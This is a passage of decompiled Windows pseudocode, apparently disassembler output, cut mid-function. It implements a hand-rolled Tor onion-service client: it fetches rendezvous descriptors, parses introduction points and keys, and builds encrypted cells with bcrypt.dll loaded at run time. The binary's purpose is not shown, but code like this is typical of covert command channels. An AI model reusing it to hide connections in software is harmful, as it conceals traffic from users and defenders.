                        								if( *(_t961 - 0x6a8) != 2) {
                        									L7:
                        									__eflags =  *(_t961 - 0x6a8) - 4;
                        									if(__eflags != 0) {
                        										L9:
                        										_t587 = E00403C2A(__eflags, _t935, _t961 +  *(_t961 - 0x6a8) * 4 - 0x6dc, _t961 +  *(_t961 - 0x6a8) * 4 - 0x6f0, _t961 +  *(_t961 - 0x6a8) * 4 - 0x704, _t961 +  *(_t961 - 0x6a8) * 4 - 0x718);
                        										_t580 = _t587;
                        										__eflags = _t587;
                        										if(_t587 != 0) {
                        											continue;
                        										}
                        										__eflags =  *(_t961 - 0x6a8) - 1;
                        										if( *(_t961 - 0x6a8) != 1) {
                        											L12:
                        											__eflags =  *(_t961 - 0x6a8) - 4;
                        											if(__eflags != 0) {
                        												__eflags =  *(_t961 - 0x6a8) - 3;
                        												if( *(_t961 - 0x6a8) != 3) {
                        													__eflags =  *(_t961 - 0x6a8) - 2;
                        													if(__eflags != 0) {
                        														__eflags =  *(_t961 - 0x6a8);
                        														if(__eflags != 0) {
                        															while(1) {
                        																L116:
                        																 *(_t961 - 0x6a8) =  *(_t961 - 0x6a8) + 1;
                        																goto L118;
                        															}
                        														}
                        														__eflags = E00402D52(_t926, __eflags,  *((intOrPtr*)(_t961 - 0x6f0)),  *((intOrPtr*)(_t961 - 0x704)),  *((intOrPtr*)(_t961 + 0x10)),  *((intOrPtr*)(_t961 + 0x14)), _t961 - 0x764);
                        														if(__eflags == 0) {
                        															goto L117;
                        														}
                        														E00404224(__eflags,  *((intOrPtr*)(_t961 - 0x764)), 0x40826c, 7, 0,  *((intOrPtr*)(_t961 + 0x10)));
                        														 *(_t961 - 0x760) = 0;
                        														_t617 = E00404656(0x186a0, _t961 - 0x77c);
                        														__eflags = _t617;
                        														if(_t617 == 0) {
                        															goto L117;
                        														}
                        														_t619 = E00404656(0x186a0, _t961 - 0x780);
                        														__eflags = _t619;
                        														if(_t619 == 0) {
                        															goto L117;
                        														}
                        														_t937 =  *(_t961 - 0x77c);
                        														 *(_t961 - 0x24) = 0;
                        														 *(_t961 - 0x2c) = 0;
                        														while(1) {
                        															E0040621F( *((intOrPtr*)(_t961 - 0x764)), 0, _t961 - 0x778, 0xa, 0);
                        															_push(_t961 - 0x76c);
                        															_push(0);
                        															_push(0);
                        															_t623 = _t961 - 0x778;
                        															_push(_t623);
                        															_push(0);
                        															L00406A24();
                        															__eflags = _t623;
                        															if(__eflags <= 0) {
                        																goto L117;
                        															}
                        															_t625 = E00404359(__eflags,  *((intOrPtr*)(_t961 - 0x764)), _t961 - 0x760,  *((intOrPtr*)(_t961 + 0x10)));
                        															__eflags = _t625;
                        															if(_t625 <= 0) {
                        																goto L117;
                        															}
                        															 *(_t961 - 0x24) =  *(_t961 - 0x24) + _t625;
                        															_t956 =  *(_t961 - 0x760);
                        															_t907 = _t625;
                        															memcpy(_t937, _t956, _t907);
                        															_t963 = _t963 + 0xc;
                        															_t937 = _t956 + _t907 + _t907;
                        															E00404681(_t961 - 0x760);
                        															__eflags =  *(_t961 - 0x24) - 0x202;
                        															if( *(_t961 - 0x24) < 0x202) {
                        																continue;
                        															}
                        															_t926 =  *(_t961 - 0x77c);
                        															_t631 =  *(_t926 + 0x10) & 0x0000ffff;
                        															__eflags = _t631 + 0x19 -  *(_t961 - 0x24);
                        															if(_t631 + 0x19 >  *(_t961 - 0x24)) {
                        																continue;
                        															}
                        															_t912 =  *(_t631 + _t926 + 0x17) & 0x0000ffff;
                        															__eflags =  *(_t961 - 0x24) - _t912 + _t631 + 0x21b;
                        															if( *(_t961 - 0x24) != _t912 + _t631 + 0x21b) {
                        																continue;
                        															}
                        															E00406270(0x40807e, 0xa, _t961 - 0x63c);
                        															asm("bswap eax");
                        															_t638 =  *((intOrPtr*)(_t937 - 0x1fd)) + ( *(_t961 - 0x63c) & 0x000000ff) * 0x15180 / 0x100;
                        															_t926 = _t638 % 0x15180;
                        															asm("bswap eax");
                        															 *(_t961 - 0x61e) = _t638 / 0x15180;
                        															E00406259( *((intOrPtr*)(_t961 - 0x780)), 0x186a0);
                        															_t960 =  *((intOrPtr*)(_t961 - 0x780));
                        															 *((char*)(_t960 + 4)) = 8;
                        															_t643 = E004061D2(_t937 - 0x1fd, _t960 + 5, 4);
                        															 *((short*)(_t960 + 9)) = 0x404;
                        															_push( *((intOrPtr*)(_t961 - 0x6f0)));
                        															L00406A0C();
                        															 *((intOrPtr*)(_t960 + 0xb)) = _t643;
                        															 *((intOrPtr*)(_t960 + 0xf)) = 0x40401;
                        															_t580 = E00404224(__eflags,  *((intOrPtr*)(_t961 - 0x764)), _t960, 0x202, 0,  *((intOrPtr*)(_t961 + 0x10)));
                        															while(1) {
                        																L116:
                        																 *(_t961 - 0x6a8) =  *(_t961 - 0x6a8) + 1;
                        																goto L118;
                        															}
                        														}
                        														goto L117;
                        													}
                        													_t649 = E004031BE(__eflags,  *((intOrPtr*)(_t961 - 8)),  *(_t961 - 4),  *((intOrPtr*)(_t961 - 0xc)),  *((intOrPtr*)(_t961 - 0x10)),  *((intOrPtr*)(_t961 + 0x10)),  *((intOrPtr*)(_t961 - 0x764)),  *((intOrPtr*)(_t961 - 0x6ec)),  *(_t961 - 0x714),  *((intOrPtr*)(_t961 - 0x6e8)),  *((intOrPtr*)(_t961 - 0x6fc)),  *((intOrPtr*)(_t961 - 0x6dc)),  *(_t961 - 0x6d4), 1, _t961 - 0x200, _t961 - 0x1fc, _t961 - 0x1f8, _t961 - 0x1f4, _t961 - 0x238);
                        													__eflags = _t649;
                        													if(_t649 <= 0) {
                        														goto L117;
                        													}
                        													_t650 = E00406259( *((intOrPtr*)(_t961 - 0x780)), 0x186a0);
                        													_t939 =  *((intOrPtr*)(_t961 - 0x780));
                        													 *_t939 = 0x80;
                        													 *((char*)(_t939 + 3)) = 1;
                        													 *((char*)(_t939 + 4)) = 3;
                        													 *((char*)(_t939 + 5)) = 0x21;
                        													 *((char*)(_t939 + 0xf)) = 0x14;
                        													_t916 = 0;
                        													while(1) {
                        														__eflags = _t916 - 0x14;
                        														if(_t916 >= 0x14) {
                        															break;
                        														}
                        														 *[ss:ecx+ebp-0x650] = _t650;
                        														_t916 = _t916 + 1;
                        														__eflags = _t916;
                        													}
                        													E004061D2(_t961 - 0x650, _t939 + 0x10, 0x14);
                        													E00403616( *((intOrPtr*)(_t961 - 8)),  *((intOrPtr*)(_t961 - 0x200)),  *((intOrPtr*)(_t961 - 0x1f8)), 0, _t939 + 5, 0,  *((intOrPtr*)(_t961 - 0x230)));
                        													E00404224(__eflags,  *((intOrPtr*)(_t961 - 0x764)),  *((intOrPtr*)(_t961 - 0x780)), 0x202, 0,  *((intOrPtr*)(_t961 + 0x10)));
                        													_t657 = E00404554( *((intOrPtr*)(_t961 - 0x764)),  *(_t961 - 0x77c), 0x202,  *((intOrPtr*)(_t961 + 0x10)), 0x14);
                        													_t940 =  *(_t961 - 0x77c);
                        													__eflags = _t657;
                        													if(_t657 != 0) {
                        														goto L117;
                        													}
                        													__eflags = _t940[4] - 3;
                        													if(__eflags != 0) {
                        														goto L117;
                        													}
                        													_t580 = E00403697(__eflags,  *((intOrPtr*)(_t961 - 8)),  *((intOrPtr*)(_t961 - 0x1fc)),  *((intOrPtr*)(_t961 - 0x1f4)), 0,  &(_t940[5]), 1,  *((intOrPtr*)(_t961 - 0x22c)));
                        													__eflags = _t580;
                        													if(_t580 == 0) {
                        														goto L117;
                        													}
                        													__eflags = _t940[5] - 0x27;
                        													if(_t940[5] != 0x27) {
                        														goto L117;
                        													}
                        													while(1) {
                        														L116:
                        														 *(_t961 - 0x6a8) =  *(_t961 - 0x6a8) + 1;
                        														goto L118;
                        													}
                        												}
                        												 *(_t961 - 0x34) = 0;
                        												 *(_t961 - 0x14) = 2;
                        												 *(_t961 - 0x18) = 1;
                        												while(1) {
                        													__eflags =  *(_t961 - 0x34) - 2;
                        													if( *(_t961 - 0x34) >= 2) {
                        														break;
                        													}
                        													 *((char*)(_t961 - 0x61a)) =  *(_t961 - 0x34);
                        													E004030CA( *((intOrPtr*)(_t961 - 8)), _t961 - 0x61e, 5, _t961 - 0x632, 0, 0xffffffff);
                        													E004030CA( *((intOrPtr*)(_t961 - 8)), _t961 - 0x63c, 0x1e, _t961 - 0x619, 0, 0xffffffff);
                        													E00406368(_t961 - 0x619, 0x14, _t961 - 0x605);
                        													E004061D2(_t961 - 0x6a4, _t961 - 0x24, 4);
                        													E004061D2(_t961 - 0x6a4, _t961 - 0x2c, 4);
                        													_t903 = 0;
                        													while(1) {
                        														__eflags =  *(_t961 - 0x2c);
                        														if( *(_t961 - 0x2c) <= 0) {
                        															break;
                        														}
                        														E004061D2(_t961 - 0x2c, _t961 - 0x24, 4);
                        														 *(_t961 - 0x24) =  *(_t961 - 0x24) >> 1;
                        														_t684 = E00403C2A(__eflags, E00403CE1( *((intOrPtr*)(_t961 - 0x23c)), _t903 +  *(_t961 - 0x24), 8), _t961 - 0x6d0, _t961 - 0x6e4, _t961 - 0x6f8, _t961 - 0x70c);
                        														 *(_t961 - 0x20) = 0;
                        														__eflags = _t684;
                        														if(_t684 != 0) {
                        															L62:
                        															__eflags =  *(_t961 - 0x20) - 1;
                        															if( *(_t961 - 0x20) != 1) {
                        																E004061D2(_t961 - 0x24, _t961 - 0x2c, 4);
                        															} else {
                        																_t903 = _t903 +  *(_t961 - 0x24) + 1;
                        																 *(_t961 - 0x2c) =  *(_t961 - 0x2c) -  *(_t961 - 0x24) + 1;
                        															}
                        															continue;
                        														}
                        														CryptStringToBinaryA( *(_t961 - 0x6d0), 0, 1, 0, _t961 - 0x1c, 0, 0);
                        														CryptStringToBinaryA( *(_t961 - 0x6d0), 0, 1, _t961 - 0x5a1, _t961 - 0x1c, 0, 0);
                        														_t923 = 0;
                        														while(1) {
                        															__eflags = _t923 - 0x14;
                        															if(_t923 >= 0x14) {
                        																goto L62;
                        															}
                        															_t747 =  *[ss:ecx+ebp-0x5a1];
                        															__eflags = _t747 -  *[ss:ecx+ebp-0x619];
                        															if(_t747 >  *[ss:ecx+ebp-0x619]) {
                        																goto L62;
                        															}
                        															__eflags = _t747 -  *[ss:ecx+ebp-0x619];
                        															if(_t747 !=  *[ss:ecx+ebp-0x619]) {
                        																 *(_t961 - 0x20) = 1;
                        															}
                        															_t923 = _t923 + 1;
                        														}
                        														goto L62;
                        													}
                        													 *(_t961 - 0x1c) = 0;
                        													while(1) {
                        														__eflags =  *(_t961 - 0x1c) - 3;
                        														if( *(_t961 - 0x1c) >= 3) {
                        															break;
                        														}
                        														_t689 = E00403CE1( *((intOrPtr*)(_t961 - 0x23c)), _t903, 8);
                        														_t903 = _t903 + 1;
                        														_t926 = _t689;
                        														__eflags = E00403C2A(__eflags, _t689, _t961 - 0x6d0, _t961 - 0x6e4, _t961 - 0x6f8, _t961 - 0x70c);
                        														if(__eflags != 0) {
                        															continue;
                        														}
                        														__eflags = E004031BE(__eflags,  *((intOrPtr*)(_t961 - 8)),  *(_t961 - 4),  *((intOrPtr*)(_t961 - 0xc)),  *((intOrPtr*)(_t961 - 0x10)),  *((intOrPtr*)(_t961 + 0x10)),  *((intOrPtr*)(_t961 - 0x764)),  *((intOrPtr*)(_t961 - 0x6ec)),  *(_t961 - 0x714),  *((intOrPtr*)(_t961 - 0x6e4)),  *((intOrPtr*)(_t961 - 0x6f8)),  *((intOrPtr*)(_t961 - 0x6dc)),  *(_t961 - 0x6d0),  *(_t961 - 0x14), _t961 - 0x1f0, _t961 - 0x1ec, _t961 - 0x1e8, _t961 - 0x1e4, _t961 - 0x228);
                        														if(__eflags <= 0) {
                        															L88:
                        															E00403515( *((intOrPtr*)(_t961 - 0x764)),  *(_t961 - 0x77c),  *((intOrPtr*)(_t961 + 0x10)),  *(_t961 - 0x14));
                        															 *(_t961 - 0x14) =  *(_t961 - 0x14) + 1;
                        															 *(_t961 - 0x18) =  *(_t961 - 0x18) + 1;
                        															 *(_t961 - 0x1c) =  *(_t961 - 0x1c) + 1;
                        															_t580 = E00406561(__eflags,  *((intOrPtr*)(_t961 - 0x780)), 0x186a0, "-----END MESSAGE-----");
                        															__eflags = _t580;
                        															if(_t580 != 0) {
                        																 *(_t961 - 0x30) = _t580;
                        																goto L116;
                        															}
                        															continue;
                        														}
                        														E00406259( *((intOrPtr*)(_t961 - 0x780)), 0x186a0);
                        														_t941 =  *((intOrPtr*)(_t961 - 0x780));
                        														 *_t941 = 0x80;
                        														 *((char*)(_t941 + 3)) =  *(_t961 - 0x14);
                        														 *((char*)(_t941 + 4)) = 3;
                        														 *((char*)(_t941 + 5)) = 0xd;
                        														 *((char*)(_t941 + 9)) =  *(_t961 - 0x18);
                        														E00403616( *((intOrPtr*)(_t961 - 8)),  *((intOrPtr*)(_t961 - 0x1f0)),  *((intOrPtr*)(_t961 - 0x1e8)), 0, _t941 + 5, 0,  *((intOrPtr*)(_t961 - 0x220)));
                        														E00404224(__eflags,  *((intOrPtr*)(_t961 - 0x764)),  *((intOrPtr*)(_t961 - 0x780)), 0x202, 0,  *((intOrPtr*)(_t961 + 0x10)));
                        														_t709 = E00404554( *((intOrPtr*)(_t961 - 0x764)),  *(_t961 - 0x77c), 0x202,  *((intOrPtr*)(_t961 + 0x10)), 0x14);
                        														_t942 =  *(_t961 - 0x77c);
                        														__eflags = _t709;
                        														if(_t709 != 0) {
                        															goto L117;
                        														}
                        														__eflags = _t942[4] - 3;
                        														if(__eflags != 0) {
                        															goto L88;
                        														}
                        														_t711 = E00403697(__eflags,  *((intOrPtr*)(_t961 - 8)),  *((intOrPtr*)(_t961 - 0x1ec)),  *((intOrPtr*)(_t961 - 0x1e4)), 0,  &(_t942[5]), 1,  *((intOrPtr*)(_t961 - 0x21c)));
                        														__eflags = _t711;
                        														if(_t711 == 0) {
                        															goto L117;
                        														}
                        														__eflags = _t942[5] - 4;
                        														if(__eflags != 0) {
                        															goto L88;
                        														}
                        														E00406259( *((intOrPtr*)(_t961 - 0x780)), 0x186a0);
                        														_t943 =  *((intOrPtr*)(_t961 - 0x780));
                        														 *_t943 = 0x80;
                        														 *((char*)(_t943 + 3)) =  *(_t961 - 0x14);
                        														 *((char*)(_t943 + 4)) = 3;
                        														 *((char*)(_t943 + 5)) = 2;
                        														 *((char*)(_t943 + 9)) =  *(_t961 - 0x18);
                        														_t717 = wsprintfA(_t943 + 0x10, "GET /tor/rendezvous2/%s HTTP/1.0\r\nHost: %s\r\nConnection: close\r\n\r\n", _t961 - 0x605,  *((intOrPtr*)(_t961 - 0x6e4)));
                        														_t963 = _t963 + 0x10;
                        														_t718 = _t717 + 1;
                        														__eflags = _t718;
                        														 *(_t943 + 0xf) = _t718;
                        														E00403616( *((intOrPtr*)(_t961 - 8)),  *((intOrPtr*)(_t961 - 0x1f0)),  *((intOrPtr*)(_t961 - 0x1e8)), 0, _t943 + 5, 1,  *((intOrPtr*)(_t961 - 0x220)));
                        														E00404224(__eflags,  *((intOrPtr*)(_t961 - 0x764)),  *((intOrPtr*)(_t961 - 0x780)), 0x202, 0,  *((intOrPtr*)(_t961 + 0x10)));
                        														 *(_t961 - 0x24) = 0;
                        														 *(_t961 - 0x2c) = 2;
                        														 *(_t961 - 0x30) = 0;
                        														_t957 =  *(_t961 - 0x77c);
                        														_t944 =  *((intOrPtr*)(_t961 - 0x780));
                        														E00406259( *((intOrPtr*)(_t961 - 0x780)), 0x186a0);
                        														while(1) {
                        															E0040621F( *((intOrPtr*)(_t961 - 0x764)), 0, _t961 - 0x778, 0xa, 0);
                        															_push(_t961 - 0x76c);
                        															_push(0);
                        															_push(0);
                        															_t726 = _t961 - 0x778;
                        															_push(_t726);
                        															_push(0);
                        															L00406A24();
                        															__eflags = _t726;
                        															if(_t726 < 0) {
                        																goto L117;
                        															}
                        															__eflags = _t726;
                        															if(__eflags == 0) {
                        																goto L88;
                        															}
                        															_t729 = E00404359(__eflags,  *((intOrPtr*)(_t961 - 0x764)), _t961 - 0x760,  *((intOrPtr*)(_t961 + 0x10)));
                        															__eflags = _t729;
                        															if(_t729 <= 0) {
                        																goto L117;
                        															}
                        															_t929 =  &(( *(_t961 - 0x77c))[ *(_t961 - 0x24)]);
                        															 *(_t961 - 0x24) =  *(_t961 - 0x24) + _t729;
                        															__eflags =  *(_t961 - 0x24) - 0x186a0;
                        															if( *(_t961 - 0x24) > 0x186a0) {
                        																goto L119;
                        															}
                        															E004061D2( *(_t961 - 0x760), _t929, _t729);
                        															E00404681(_t961 - 0x760);
                        															_t733 =  *(_t961 - 0x24);
                        															_t734 = _t733 / 0x202;
                        															_t926 = _t733 % 0x202;
                        															__eflags = _t733 % 0x202;
                        															if(_t733 % 0x202 != 0) {
                        																continue;
                        															}
                        															 *(_t961 - 0x28) = _t734;
                        															while(1) {
                        																__eflags =  *(_t961 - 0x28);
                        																if( *(_t961 - 0x28) <= 0) {
                        																	break;
                        																}
                        																__eflags =  *_t957 - 0x80;
                        																if(__eflags != 0) {
                        																	L85:
                        																	_t957 =  &(_t957[0x202]);
                        																	_t424 = _t961 - 0x28;
                        																	 *_t424 =  *(_t961 - 0x28) - 1;
                        																	__eflags =  *_t424;
                        																	continue;
                        																}
                        																_t739 = E00403697(__eflags,  *((intOrPtr*)(_t961 - 8)),  *((intOrPtr*)(_t961 - 0x1ec)),  *((intOrPtr*)(_t961 - 0x1e4)), 0,  &(_t957[5]),  *(_t961 - 0x2c),  *((intOrPtr*)(_t961 - 0x21c)));
                        																__eflags = _t739;
                        																if(_t739 == 0) {
                        																	goto L117;
                        																}
                        																__eflags = _t957[4] - 0x503;
                        																if(_t957[4] == 0x503) {
                        																	goto L85;
                        																}
                        																__eflags = _t957[4] - 0x203;
                        																if(__eflags != 0) {
                        																	goto L88;
                        																}
                        																_t920 = _t957[0xe];
                        																E004061D2( &(_t957[0x10]), _t944, _t920);
                        																_t944 = _t944 + _t920;
                        																_t422 = _t961 - 0x2c;
                        																 *_t422 =  *(_t961 - 0x2c) + 1;
                        																__eflags =  *_t422;
                        																goto L85;
                        															}
                        														}
                        														goto L117;
                        													}
                        													_t439 = _t961 - 0x34;
                        													 *_t439 =  *(_t961 - 0x34) + 1;
                        													__eflags =  *_t439;
                        												}
                        											} else {
                        												_t749 = E00406561(__eflags,  *((intOrPtr*)(_t961 - 0x780)), 0x186a0, "-----BEGIN MESSAGE-----") + 0x17;
                        												 *(_t961 - 0x30) =  *(_t961 - 0x30) - _t749;
                        												_t945 =  *(_t961 - 0x77c);
                        												while(1) {
                        													__eflags =  *(_t961 - 0x30);
                        													if( *(_t961 - 0x30) <= 0) {
                        														break;
                        													}
                        													asm("lodsb");
                        													__eflags = _t749 - 0x20;
                        													if(_t749 > 0x20) {
                        														asm("stosb");
                        													}
                        													_t27 = _t961 - 0x30;
                        													 *_t27 =  *(_t961 - 0x30) - 1;
                        													__eflags =  *_t27;
                        												}
                        												 *_t945 = 0;
                        												CryptStringToBinaryA( *(_t961 - 0x77c), 0, 1, 0, _t961 - 0x1c, 0, 0);
                        												_t753 = E00404656( *(_t961 - 0x1c), _t961 - 0x784);
                        												__eflags = _t753;
                        												if(_t753 == 0) {
                        													break;
                        												}
                        												CryptStringToBinaryA( *(_t961 - 0x77c), 0, 1,  *(_t961 - 0x784), _t961 - 0x1c, 0, 0);
                        												_t946 =  *(_t961 - 0x784);
                        												_t904 = 0;
                        												while(1) {
                        													__eflags = _t904 - 3;
                        													if(_t904 >= 3) {
                        														break;
                        													}
                        													__eflags =  *(_t961 - 0x1c);
                        													if(__eflags > 0) {
                        														_t892 = E00406527(__eflags, _t946,  *(_t961 - 0x1c), "introduction-point");
                        														__eflags = _t892;
                        														if(__eflags == 0) {
                        															break;
                        														}
                        														 *(_t961 + _t904 * 4 - 0x72c) = _t892;
                        														_t893 = E00406527(__eflags, _t946,  *(_t961 - 0x1c), "ip-address");
                        														__eflags = _t893;
                        														if(__eflags == 0) {
                        															goto L119;
                        														}
                        														 *(_t961 + _t904 * 4 - 0x738) = _t893;
                        														_t894 = E00406527(__eflags, _t946,  *(_t961 - 0x1c), "onion-port");
                        														__eflags = _t894;
                        														if(__eflags == 0) {
                        															goto L119;
                        														}
                        														 *(_t961 + _t904 * 4 - 0x744) = _t894;
                        														_t895 = E00406561(__eflags, _t946,  *(_t961 - 0x1c), "service-key");
                        														__eflags = _t895;
                        														if(__eflags == 0) {
                        															goto L119;
                        														}
                        														_t897 = _t895 + 1 - _t946;
                        														_t946 =  &(_t946[_t897]);
                        														 *(_t961 - 0x1c) =  *(_t961 - 0x1c) - _t897;
                        														_t898 = E00406561(__eflags, _t946,  *(_t961 - 0x1c), "KEY-----");
                        														__eflags = _t898;
                        														if(__eflags == 0) {
                        															goto L119;
                        														}
                        														 *((intOrPtr*)(_t961 + _t904 * 4 - 0x750)) = _t898 + 8;
                        														_t900 = E00406561(__eflags, _t946,  *(_t961 - 0x1c), "-----END");
                        														__eflags = _t900;
                        														if(_t900 == 0) {
                        															goto L119;
                        														}
                        														 *_t900 = 0;
                        														_t904 = _t904 + 1;
                        														__eflags = _t904;
                        														continue;
                        													}
                        													break;
                        												}
                        												while(1) {
                        													__eflags = _t904;
                        													if(__eflags <= 0) {
                        														break;
                        													}
                        													_t904 = _t904 - 1;
                        													_t761 = E004031BE(__eflags,  *((intOrPtr*)(_t961 - 8)),  *(_t961 - 4),  *((intOrPtr*)(_t961 - 0xc)),  *((intOrPtr*)(_t961 - 0x10)),  *((intOrPtr*)(_t961 + 0x10)),  *((intOrPtr*)(_t961 - 0x764)),  *((intOrPtr*)(_t961 - 0x6ec)),  *(_t961 - 0x714),  *(_t961 + _t904 * 4 - 0x738),  *(_t961 + _t904 * 4 - 0x744),  *((intOrPtr*)(_t961 - 0x6dc)),  *(_t961 + _t904 * 4 - 0x72c),  *(_t961 - 0x14), _t961 - 0x1e0, _t961 - 0x1dc, _t961 - 0x1d8, _t961 - 0x1d4, _t961 - 0x218);
                        													__eflags = _t761;
                        													if(_t761 <= 0) {
                        														L43:
                        														E00403515( *((intOrPtr*)(_t961 - 0x764)),  *(_t961 - 0x77c),  *((intOrPtr*)(_t961 + 0x10)),  *(_t961 - 0x14));
                        														_t217 = _t961 - 0x14;
                        														 *_t217 =  *(_t961 - 0x14) + 1;
                        														__eflags =  *_t217;
                        														continue;
                        													}
                        													_t797 = E004065B9(E00406259(_t961 - 0x63c, 0x400), 0x100);
                        													asm("stosb");
                        													asm("loop 0xfffffff5");
                        													 *((char*)(_t961 - 0x42a)) = 2;
                        													_push( *((intOrPtr*)(_t961 - 0x6e0)));
                        													L00406A0C();
                        													 *((intOrPtr*)(_t961 - 0x429)) = _t797;
                        													_t798 = E004061EA( *((intOrPtr*)(_t961 - 0x6f4)));
                        													 *((char*)(_t961 - 0x425)) = _t798;
                        													 *((char*)(_t961 - 0x424)) = _t798;
                        													CryptStringToBinaryA( *(_t961 - 0x6d4), 0, 1, 0, _t961 - 0x24, 0, 0);
                        													CryptStringToBinaryA( *(_t961 - 0x6d4), 0, 1, _t961 - 0x423, _t961 - 0x24, 0, 0);
                        													_t806 = E00403DE9(_t926, __eflags,  *((intOrPtr*)(_t961 - 0x6ec)),  *(_t961 - 0x714), _t961 - 0x423, _t961 - 0x40d);
                        													__eflags = _t806;
                        													if(_t806 == 0) {
                        														L117:
                        														_t580 = E00405FFB( *((intOrPtr*)(_t961 + 0x10)),  *((intOrPtr*)(_t961 + 0x14)),  *((intOrPtr*)(_t961 - 0x764)));
                        														 *(_t961 - 0x6a8) = 0;
                        														goto L118;
                        													}
                        													 *(_t961 - 0x40f) = _t806;
                        													 *(_t961 - 0x40e) = _t806;
                        													E004061D2(_t961 - 0x650, _t961 - 0x381, 0x14);
                        													 *((char*)(_t961 - 0x1c4)) = 7;
                        													 *((char*)(_t961 - 0x1c3)) = 2;
                        													 *((short*)(_t961 - 0x1c2)) = 0;
                        													 *((intOrPtr*)(_t961 - 0x1c0)) = 0xaa02;
                        													 *((intOrPtr*)(_t961 - 0x1bc)) = 0x32484400;
                        													 *(_t961 - 0x1b8) = 0x400;
                        													E004065B9(E004061D2(0x40841c, _t961 - 0x1b4, 0x80), 0x100);
                        													asm("stosb");
                        													asm("loop 0xfffffff5");
                        													E00406259(_t961 - 0x134, 0x80);
                        													 *((char*)(_t961 - 0x134)) = 2;
                        													E00403BB4( *(_t961 - 4), _t961 - 0x1c4, _t961 - 0x36d);
                        													_t952 = _t961 - 0x5b0;
                        													_t818 = 1;
                        													while(1) {
                        														_t818 = _t818;
                        														__eflags = _t818;
                        														if(_t818 == 0) {
                        															break;
                        														}
                        														asm("lodsb");
                        														__eflags = _t818 - 0x20;
                        														if(_t818 > 0x20) {
                        															asm("stosb");
                        														}
                        													}
                        													 *_t952 = 0;
                        													CryptStringToBinaryA(_t961 - 0x5b0, 0, 1, 0, _t961 - 0x20, 0, 0);
                        													CryptStringToBinaryA(_t961 - 0x5b0, 0, 1, _t961 - 0x63c, _t961 - 0x20, 0, 0);
                        													 *(_t961 - 0x24) = 0x94;
                        													E00406259(_t961 - 0x5b0, 0x94);
                        													_push(_t961 - 0x24);
                        													_push(_t961 - 0x5b0);
                        													_push(0);
                        													_push(0x8c);
                        													_push(_t961 - 0x63c);
                        													_push(0x13);
                        													_push(1);
                        													L00406AB4();
                        													 *((intOrPtr*)(_t961 - 0x51c)) = 0x31415352;
                        													 *(_t961 - 0x518) = 0x400;
                        													 *(_t961 - 0x514) = 4;
                        													 *((intOrPtr*)(_t961 - 0x510)) = 0x80;
                        													 *(_t961 - 0x50c) = 0;
                        													 *(_t961 - 0x508) = 0;
                        													asm("bswap eax");
                        													 *((intOrPtr*)(_t961 - 0x504)) =  *((intOrPtr*)(_t961 - 0x5a0));
                        													E0040618C(_t961 - 0x51d, _t961 - 0x500, 0x80);
                        													_push(0);
                        													_push(0x9c);
                        													_push(_t961 - 0x51c);
                        													_push(_t961 - 0x1c8);
                        													_push(L"RSAPUBLICBLOB");
                        													_push(0);
                        													_push( *((intOrPtr*)(_t961 - 0xc)));
                        													 *((intOrPtr*)(E00406788(__eflags, E00406698("bcrypt.dll"), "BCryptImportKeyPair")))();
                        													E00406259( *((intOrPtr*)(_t961 - 0x780)), 0x186a0);
                        													_t953 =  *((intOrPtr*)(_t961 - 0x780));
                        													 *_t953 = 0x80;
                        													 *((char*)(_t953 + 3)) =  *(_t961 - 0x14);
                        													 *((char*)(_t953 + 4)) = 3;
                        													 *((char*)(_t953 + 5)) = 0x22;
                        													 *((char*)(_t953 + 0xe)) = 0x18b;
                        													 *((char*)(_t953 + 0xf)) = 0x18b;
                        													E004030CA( *((intOrPtr*)(_t961 - 8)), _t961 - 0x63c, 0x8c, _t953 + 0x10, 0, 0xffffffff);
                        													 *((intOrPtr*)(_t961 - 0x75c)) = L"SHA1";
                        													 *(_t961 - 0x758) = 0;
                        													 *(_t961 - 0x754) = 0;
                        													_push(4);
                        													_push(_t961 - 0x2c);
                        													_push(0x80);
                        													_push(_t953 + 0x24);
                        													_push(0);
                        													_push(0);
                        													_push(_t961 - 0x75c);
                        													_push(0x56);
                        													_push(_t961 - 0x43a);
                        													_push( *((intOrPtr*)(_t961 - 0x1c8)));
                        													 *((intOrPtr*)(E00406788(__eflags, E00406698("bcrypt.dll"), "BCryptEncrypt")))();
                        													E0040605D(_t961 - 0x1c8, _t961 - 0x1c8, 0, 1);
                        													 *((intOrPtr*)(_t961 - 0x51c)) = 0x4d42444b;
                        													 *(_t961 - 0x518) = 1;
                        													 *(_t961 - 0x514) = 0x10;
                        													E004061D2(_t961 - 0x43a, _t961 - 0x510, 0x10);
                        													_push(0);
                        													_push(0x1c);
                        													_push(_t961 - 0x51c);
                        													_push(0);
                        													_push(0);
                        													_push(_t961 - 0x1c8);
                        													_push(L"KeyDataBlob");
                        													_push(0);
                        													_push( *((intOrPtr*)(_t961 - 0x10)));
                        													 *((intOrPtr*)(E00406788(__eflags, E00406698("bcrypt.dll"), "BCryptImportKey")))();
                        													E004061D2(_t961 - 0x3e4, _t953 + 0xa4, 0xf7);
                        													E00403554(__eflags,  *((intOrPtr*)(_t961 - 0x1c8)), _t953 + 0xa4, 0xf7, 0);
                        													E0040605D(_t961 - 0x1c8, _t961 - 0x1c8, 0, 1);
                        													E00403616( *((intOrPtr*)(_t961 - 8)),  *((intOrPtr*)(_t961 - 0x1e0)),  *((intOrPtr*)(_t961 - 0x1d8)), 0, _t953 + 5, 0,  *((intOrPtr*)(_t961 - 0x210)));
                        													E00404224(__eflags,  *((intOrPtr*)(_t961 - 0x764)),  *((intOrPtr*)(_t961 - 0x780)), 0x202, 0,  *((intOrPtr*)(_t961 + 0x10)));
                        													_t876 = E00404554( *((intOrPtr*)(_t961 - 0x764)),  *(_t961 - 0x77c), 0x404,  *((intOrPtr*)(_t961 + 0x10)), 0x64);
                        													_t954 =  *(_t961 - 0x77c);
                        													__eflags = _t876;
                        													if(_t876 != 0) {
                        														goto L117;
                        													}
                        													__eflags = _t954[4] - 3;
                        													if(__eflags != 0) {
                        														goto L119;
                        													}
                        													_t878 = E00403697(__eflags,  *((intOrPtr*)(_t961 - 8)),  *((intOrPtr*)(_t961 - 0x1dc)),  *((intOrPtr*)(_t961 - 0x1d4)), 0,  &(_t954[5]), 1,  *((intOrPtr*)(_t961 - 0x20c)));
                        													__eflags = _t878;
                        													if(_t878 == 0) {
                        														goto L117;
                        													}
                        													__eflags = _t954[5] - 0x28;
                        													if(__eflags != 0) {
                        														goto L119;
                        													}
                        													_t880 = E00403697(__eflags,  *((intOrPtr*)(_t961 - 8)),  *((intOrPtr*)(_t961 - 0x1fc)),  *((intOrPtr*)(_t961 - 0x1f4)), 0,  &(_t954[0x207]), 2,  *((intOrPtr*)(_t961 - 0x22c)));
                        													__eflags = _t880;
